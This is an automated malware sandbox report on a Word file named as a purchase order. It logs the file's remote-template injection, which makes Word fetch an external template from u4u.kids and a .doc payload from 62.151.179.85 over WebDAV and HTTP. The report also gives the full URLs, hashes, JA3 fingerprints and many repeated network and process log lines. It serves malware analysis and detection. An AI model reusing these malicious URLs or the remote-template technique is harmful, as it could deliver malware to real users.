Windows Analysis Report
PO NAHK22012FA000000.docx

Overview

General Information

Sample name: PO NAHK22012FA000000.docx
Analysis ID: 1540372
MD5: 48dd0e8d2647a5d093f64f186dcac877
SHA1: 258650076b605d2d46984016ad2986e7e41b6b9e
SHA256: e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)
Contains an external reference to another file
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: Joe Sandbox View ASN Name: TWC-12271-NYCUS TWC-12271-NYCUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: u4u.kids
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:14 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal56.evad.winDOCX@1/16@7/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ NAHK22012FA000000.docx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR894B.tmp Jump to behavior
Source: PO NAHK22012FA000000.docx OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx OLE document summary: title field not present or empty
Source: PO NAHK22012FA000000.docx OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: PO NAHK22012FA000000.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA000000.docx
Source: Window Recorder Window detected: More than 3 window changes detected
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/media/image3.emf
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/media/image2.emf
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/media/image2.emf
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/media/image3.emf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: PO NAHK22012FA000000.docx Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRoot Jump to behavior
Source: settings.xml.rels Extracted files from sample: https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
